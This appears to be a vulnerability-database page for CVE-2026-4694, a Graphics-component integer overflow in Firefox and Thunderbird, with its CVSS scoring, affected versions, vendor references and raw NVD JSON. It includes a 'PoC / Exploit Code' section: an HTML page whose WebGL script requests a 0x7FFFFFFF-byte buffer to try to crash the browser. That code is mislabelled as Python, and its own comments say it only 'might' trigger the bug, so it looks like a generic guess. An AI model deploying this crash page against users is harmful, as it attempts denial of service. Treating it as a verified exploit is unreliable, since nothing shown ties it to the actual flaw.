Security Vulnerability Report
中文
CVE-2026-4694 CVSS 7.5 HIGH

CVE-2026-4694

Published: 2026-03-24 13:16:05
Last Modified: 2026-04-13 15:17:38
Source: [email protected]

Description

Incorrect boundary conditions, integer overflow in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 149
Mozilla Firefox ESR < 115.34
Mozilla Firefox ESR < 140.9
Mozilla Thunderbird < 149
Mozilla Thunderbird < 140.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-4694: Graphics Integer Overflow --> <!-- This PoC attempts to trigger a crash in the graphics component by manipulating canvas/WebGL buffers. --> <!DOCTYPE html> <html> <head><title>CVE-2026-4694 PoC</title></head> <body> <h1>CVE-2026-4694 Graphics Integer Overflow PoC</h1> <canvas id="c" width="1000" height="1000"></canvas> <script> // Attempt to trigger overflow in canvas buffer allocation var canvas = document.getElementById('c'); var gl = canvas.getContext('webgl'); if (gl) { // Create a large buffer size that might trigger integer overflow in boundary checks var size = 0x7FFFFFFF; try { var buffer = gl.createBuffer(); gl.bindBuffer(gl.ARRAY_BUFFER, buffer); // This bufferData call may cause the overflow and crash gl.bufferData(gl.ARRAY_BUFFER, size, gl.STATIC_DRAW); console.log("Buffer created, checking for crash..."); } catch(e) { console.log("Exception caught: " + e.message); } } else { console.log("WebGL not supported"); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4694", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:05.247", "lastModified": "2026-04-13T15:17:38.437", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions, integer overflow in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9."}, {"lang": "es", "value": "Condiciones de contorno incorrectas, desbordamiento de entero en el componente Gráficos. Esta vulnerabilidad afecta a Firefox &lt; 149, Firefox ESR &lt; 115.34, Firefox ESR &lt; 140.9, Thunderbird &lt; 149 y Thunderbird &lt; 140.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-754"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.34.0", "matchCriteriaId": "063BE653-69B0-4543-9A90-BC7A62C943B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.9.0", "matchCriteriaId": "525DEC0C-BB47-46C6-9AEB-98F27D4685FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.9.0", "matchCriteriaId": "4C0558B1-4113-45A8-8E37-A0793A67AD6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "40FE4697-89F1-46F6-8E28-41883647583B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2018430", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-21/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.